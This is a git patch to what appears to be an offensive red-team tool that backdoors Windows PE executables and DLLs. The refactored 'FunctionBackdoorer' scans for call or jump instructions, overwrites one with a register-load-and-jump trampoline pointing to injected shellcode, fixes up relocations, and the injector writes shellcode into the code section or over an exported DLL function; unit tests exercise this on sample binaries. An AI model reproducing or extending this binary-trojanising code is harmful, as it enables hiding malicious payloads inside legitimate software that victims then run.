From aca1ed46bc0c98f08ebd95d812e271517de04583 Mon Sep 17 00:00:00 2001 From: Dobin Date: Sat, 27 Apr 2024 14:14:23 +0100 Subject: [PATCH] refactor: remove recursion from DerBackdoorer --- pe/derbackdoorer.py | 101 ++++++++++++++++++++---------------- pe/pehelper.py | 2 +- pe/superpe.py | 10 +++- phases/injector.py | 38 ++++++-------- tests/test_derbackdoorer.py | 42 ++++++--------- tests/test_superpe.py | 2 +- 6 files changed, 99 insertions(+), 96 deletions(-) diff --git a/pe/derbackdoorer.py b/pe/derbackdoorer.py index 2806f2f..cbecc75 100644 --- a/pe/derbackdoorer.py +++ b/pe/derbackdoorer.py @@ -4,11 +4,9 @@ # import random -import textwrap import pefile import capstone import keystone -from enum import IntEnum import logging from utils import hexdump @@ -18,89 +16,101 @@ from model.defs import * logger = logging.getLogger("DerBackdoorer") -class FunctionBackdoorer: - def __init__(self, superpe: SuperPe, main_shc: bytes): - self.superpe: SuperPe = superpe - self.shellcodeData: bytes = main_shc - self.shellcodeAddr: int = 0 +class DEPTH_OPTIONS(Enum): + LEVEL1 = 1 + LEVEL2a = 2 + LEVEL2b = 3 + +class FunctionBackdoorer: + def __init__(self, superpe: SuperPe, depth_option=DEPTH_OPTIONS.LEVEL1): + self.superpe: SuperPe = superpe self.pe_data = self.superpe.pe.get_memory_mapped_image() self.cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64 + capstone.CS_MODE_LITTLE_ENDIAN) self.ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64 + keystone.KS_MODE_LITTLE_ENDIAN) self.cs.detail = True + self.depth_option: DEPTH_OPTIONS = depth_option def backdoor_function(self, function_addr: int, shellcode_addr: int): - self.shellcodeAddr = shellcode_addr logger.info("Backdooring function at 0x{:X} (to shellcode 0x{:X})".format(function_addr, shellcode_addr)) - instr = self.find_suitable_instruction_addr(function_addr, 128) - if instr is None: + addr = self.find_suitable_instruction_addr(function_addr) + if addr is None: raise Exception("Couldn't find a suitable instruction to backdoor") - compiled_trampoline, trampoline_reloc_offset = self.get_trampoline(instr) + #logger.info("--[ Choosen addr to overwrite: 0x{:X}".format(addr)) + compiled_trampoline, text_trampoline, trampoline_reloc_offset = self.get_trampoline(addr, shellcode_addr) + logger.info("--[ Backdoor 0x{:X}: {}".format( + addr, text_trampoline)) # write - self.superpe.pe.set_bytes_at_rva(instr.address, bytes(compiled_trampoline)) + self.superpe.pe.set_bytes_at_rva(addr, bytes(compiled_trampoline)) # relocs relocs = ( - instr.address + trampoline_reloc_offset, + addr + trampoline_reloc_offset, ) - pageRva = 4096 * int((instr.address + trampoline_reloc_offset) / 4096) + pageRva = 4096 * int((addr + trampoline_reloc_offset) / 4096) self.superpe.addImageBaseRelocations(pageRva, relocs) - def find_suitable_instruction_addr(self, startOffset, length, maxDepth = 5): + def find_suitable_instruction_addr(self, startOffset, length=256): """Find a instruction to backdoor. Recursively.""" - return self._find_suitable_instruction_addr(startOffset, length, maxDepth, 1) + logger.info("find suitable instr to hijack: off: from 0x{:X} len:{} depthopt:{}".format( + startOffset, length, self.depth_option)) + + if self.depth_option == DEPTH_OPTIONS.LEVEL1: + return self._find_suitable_instruction_addr(startOffset, length, 1) + else: + addr = self._find_suitable_instruction_addr(startOffset, length, 2) + logger.info("Using code at 0x{:X} to find instruction".format(addr)) + + if self.depth_option == DEPTH_OPTIONS.LEVEL2a: + return self._find_suitable_instruction_addr(addr, length, 2) + elif self.depth_option == DEPTH_OPTIONS.LEVEL2b: + return self._find_suitable_instruction_addr(addr, length, 3) + + return None - def _find_suitable_instruction_addr(self, startOffset, length, maxDepth, depth): - logger.info("find_suitable_instruction_addr: off: 0x{:X} len:{} depth:{}".format(startOffset, length, depth)) - - if depth > maxDepth: - return None + def _find_suitable_instruction_addr(self, startOffset, length, option): + #logger.info("_find_suitable_instruction_addr: off: 0x{:X} len:{} option:{}".format(startOffset, length, option)) + # iterate through every instruction. starting from startOffset data = self.pe_data[startOffset:startOffset + length] - for instr in self.cs.disasm(data, startOffset): - self.printInstr(instr, depth) - - # find a call/jmp instruction with an immediate operand + self.printInstr(instr, 0) + + if instr.mnemonic.lower() in ['ret']: + return None if len(instr.operands) != 1: continue operand = instr.operands[0] if operand.type != capstone.CS_OP_IMM: + # find a call/jmp instruction with an immediate operand continue - # We found one. check it. - logger.info('\t' * depth + f' -> Found OP_IMM: 0x{operand.value.imm:X}') - is_jumpy = instr.mnemonic.lower() in ['jmp', 'je', 'jz', 'jne', 'jnz', 'ja', 'jb', 'jae', 'jbe', 'jg', 'jl', 'jge', 'jle'] - is_jumpy |= instr.mnemonic.lower() == 'call' - if not is_jumpy: + jump_instructions = ['call', 'jmp', 'je', 'jz', 'jne', 'jnz', 'ja', 'jb', 'jae', 'jbe', 'jg', 'jl', 'jge', 'jle'] + if not instr.mnemonic.lower() in jump_instructions: continue + if option == 1: # addr + return instr.address + elif option == 2: # dest taken + return operand.value.imm + elif option == 3: # dest not taken + return instr.address + instr.size - # dont take a jump too early - if depth >= 2: - # use this as the backdoor - return instr - else: - # follow it deeper - if depth + 1 <= maxDepth: - out = self._find_suitable_instruction_addr( - operand.value.imm, length, maxDepth, depth + 1) - return out return None - def get_trampoline(self, instr): + def get_trampoline(self, addr, shellcode_addr): addrOffset = -1 if not self.superpe.is_64(): raise Exception("Not 64 bit") reg = random.choice(['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi']).upper() - full_shellcode_addr = self.shellcodeAddr + self.superpe.pe.OPTIONAL_HEADER.ImageBase + full_shellcode_addr = shellcode_addr + self.superpe.pe.OPTIONAL_HEADER.ImageBase enc, count = self.ks.asm(f'MOV {reg}, 0x{full_shellcode_addr:X}') for instr2 in self.cs.disasm(bytes(enc), 0): @@ -121,12 +131,11 @@ class FunctionBackdoorer: trampoline_text = f'MOV {reg}, 0x{full_shellcode_addr:X} ; {jump}' trampoline_compiled, count = self.ks.asm(trampoline_text) - logger.info("--[ Backdooring {} at 0x{:X} with trampoline: {}".format( - instr.mnemonic.upper(), instr.address, trampoline_text)) - return trampoline_compiled, addrOffset + + return trampoline_compiled, trampoline_text, addrOffset - def printInstr(self, instr, depth): + def printInstr(self, instr, depth=0): _bytes = [f'{x:02x}' for x in instr.bytes[:8]] if len(instr.bytes) < 8: _bytes.extend([' ',] * (8 - len(instr.bytes))) diff --git a/pe/pehelper.py b/pe/pehelper.py index 8408fc5..1a298a8 100644 --- a/pe/pehelper.py +++ b/pe/pehelper.py @@ -63,7 +63,7 @@ def get_code_section(pe: pefile.PE) -> pefile.SectionStructure: if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']: if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.Misc_VirtualSize: return sect - raise Exception("Code section not found") + raise Exception("pehelper::get_code_section(): Code section not found") # keystone/capstone stuff diff --git a/pe/superpe.py b/pe/superpe.py index c9d6edc..e8dc82d 100644 --- a/pe/superpe.py +++ b/pe/superpe.py @@ -276,11 +276,17 @@ class SuperPe(): entry["size"] = next_entry["addr"] - entry["addr"] return res - + + def get_size_of_exported_function(self, dllfunc): + exports = self.get_exports_full() + for exp in exports: + if exp["name"] == dllfunc: + return exp["size"] + return None ## Helpers - def get_physical_address(self, virtual_address) -> int: + def get_offset_from_rva(self, virtual_address) -> int: """Convert a virtual address to a physical address in the PE file""" # Iterate through the section headers to find which section contains the VA for section in self.pe.sections: diff --git a/phases/injector.py b/phases/injector.py index 09a1291..2a43bfb 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -33,35 +33,31 @@ def inject_exe( # Read prepared loader shellcode # And check if it fits into the target code section main_shc = file_readall_binary(main_shc_path) - l = len(main_shc) - if l + 128 > project.exe_host.code_section.Misc_VirtualSize: - logger.error("Error: Shellcode {}+128 too small for target code section {}".format( - l, project.exe_host.code_section.Misc_VirtualSize + shellcode_len = len(main_shc) + if shellcode_len + 128 > project.exe_host.code_section.Misc_VirtualSize: + raise Exception("Error: Shellcode {}+128 too small for target code section {}".format( + shellcode_len, project.exe_host.code_section.Misc_VirtualSize )) - return False # superpe is a representation of the exe file. We gonna modify it, and save it at the end. superpe = SuperPe(exe_in) - function_backdoorer = FunctionBackdoorer(superpe, main_shc) + function_backdoorer = FunctionBackdoorer(superpe) - shellcode_offset: int = 0 + shellcode_offset: int = 0 # file offset if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: # Special case. put it at the beginning of the exported DLL function logger.info("--[ Overwrite DLL function {} with shellcode".format(settings.dllfunc)) rva = superpe.getExportEntryPoint(settings.dllfunc) # Size and sanity checks - exports = superpe.get_exports_full() - for exp in exports: - if exp["name"] == settings.dllfunc: - if l >= exp["size"]: - raise Exception("Shellcode too large: {} > {} exported function {}".format( - l, exp["size"], settings.dllfunc - )) - break + function_size = superpe.get_size_of_exported_function(settings.dllfunc) + if shellcode_len >= function_size: + raise Exception("Shellcode too large: {} > {} exported function {}".format( + shellcode_len, function_size, settings.dllfunc + )) # Inject - shellcode_offset = superpe.get_physical_address(rva) + shellcode_offset = superpe.get_offset_from_rva(rva) logger.info(f'---[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{shellcode_offset:X} to overwrite') superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc) @@ -69,15 +65,15 @@ def inject_exe( sect = superpe.get_code_section() if sect == None: raise Exception('Could not find code section in input PE file!') - sect_name = sect.Name.decode().rstrip('\x00') sect_size = sect.Misc_VirtualSize # Better than: SizeOfRawData - if sect_size < l: + if sect_size < shellcode_len: raise Exception("Shellcode too large: {} > {}".format( - l, sect_size + shellcode_len, sect_size )) - shellcode_offset = int((sect_size - l) / 2) + shellcode_offset = int((sect_size - shellcode_len) / 2) # centered in the .text section + shellcode_offset += sect.PointerToRawData shellcode_rva = superpe.pe.get_rva_from_offset(shellcode_offset) - logger.info("--( Inject: Shellcode rva:0x{:X} offset:0x{:X}".format( + logger.info("--( Inject: Shellcode rva:0x{:X} (from offset:0x{:X})".format( shellcode_rva, shellcode_offset)) # Copy the shellcode diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py index 0b570d4..e6a7d56 100644 --- a/tests/test_derbackdoorer.py +++ b/tests/test_derbackdoorer.py @@ -1,15 +1,11 @@ -import shutil from typing import List import unittest -import logging -from model.exehost import ExeHost from model.defs import * -from pe.pehelper import extract_code_from_exe_file from utils import hexdump from observer import observer from model.defs import * -from pe.derbackdoorer import FunctionBackdoorer +from pe.derbackdoorer import FunctionBackdoorer, DEPTH_OPTIONS from pe.superpe import SuperPe @@ -20,40 +16,36 @@ class DerBackdoorerTest(unittest.TestCase): def test_function_backdoorer_exe(self): - shellcode = b"\x90" * 200 superpe = SuperPe(PATH_EXES + "iattest-full.exe") - function_backdoorer = FunctionBackdoorer(superpe, shellcode) + function_backdoorer = FunctionBackdoorer(superpe, depth_option=DEPTH_OPTIONS.LEVEL1) - instr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint(), 128, 5) - self.assertIsNotNone(instr) - self.assertEqual(instr.mnemonic, "jne") - self.assertEqual(instr.address, 0x1701) + addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint()) + self.assertEqual(addr, 0x1304) - trampoline_compiled, trampoline_reloc_offset = function_backdoorer.get_trampoline(instr) - print(hexdump(trampoline_compiled)) + trampoline_compiled, trampline_text, trampoline_reloc_offset = function_backdoorer.get_trampoline(addr, 0x11223344) self.assertEqual(trampoline_compiled[0], 0x48) - self.assertEqual(trampoline_compiled[2], 0x00) - self.assertEqual(trampoline_compiled[5], 0x40) + self.assertEqual(trampoline_compiled[2], 0x44) + self.assertEqual(trampoline_compiled[3], 0x33) + self.assertEqual(trampoline_compiled[4], 0x22) + self.assertEqual(trampoline_compiled[5], 0x51) self.assertEqual(trampoline_compiled[6], 0x01) self.assertEqual(trampoline_compiled[10], 0xff) self.assertEqual(trampoline_reloc_offset, 2) def test_function_backdoorer_dll(self): - shellcode = b"\x90" * 200 superpe = SuperPe(PATH_EXES + "libbz2-1.dll") - function_backdoorer = FunctionBackdoorer(superpe, shellcode) + function_backdoorer = FunctionBackdoorer(superpe) - instr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint(), 128, 5) - self.assertIsNotNone(instr) - self.assertEqual(instr.mnemonic, "jne") - self.assertEqual(instr.address, 0x1220) + addr = function_backdoorer.find_suitable_instruction_addr(superpe.get_entrypoint()) + self.assertEqual(addr, 0x135D) - trampoline_compiled, trampoline_reloc_offset = function_backdoorer.get_trampoline(instr) - print(hexdump(trampoline_compiled)) + trampoline_compiled, trampoline_reloc_offset = function_backdoorer.get_trampoline(addr, 0x11223344) self.assertEqual(trampoline_compiled[0], 0x48) - self.assertEqual(trampoline_compiled[2], 0x00) - self.assertEqual(trampoline_compiled[5], 0xf1) + self.assertEqual(trampoline_compiled[2], 0x44) + self.assertEqual(trampoline_compiled[3], 0x33) + self.assertEqual(trampoline_compiled[4], 0x22) + self.assertEqual(trampoline_compiled[5], 0x51) self.assertEqual(trampoline_compiled[6], 0x01) self.assertEqual(trampoline_compiled[10], 0xff) self.assertEqual(trampoline_reloc_offset, 2) \ No newline at end of file diff --git a/tests/test_superpe.py b/tests/test_superpe.py index c35463f..0c23ef3 100644 --- a/tests/test_superpe.py +++ b/tests/test_superpe.py @@ -64,5 +64,5 @@ class SuperPeTest(unittest.TestCase): self.assertEqual(export["size"], 416) # VRA/Virt to Phys/Raw - raw = superpe.get_physical_address(0xD690) # BZ2_bzdopen export + raw = superpe.get_offset_from_rva(0xD690) # BZ2_bzdopen export self.assertEqual(raw, 0xCA90)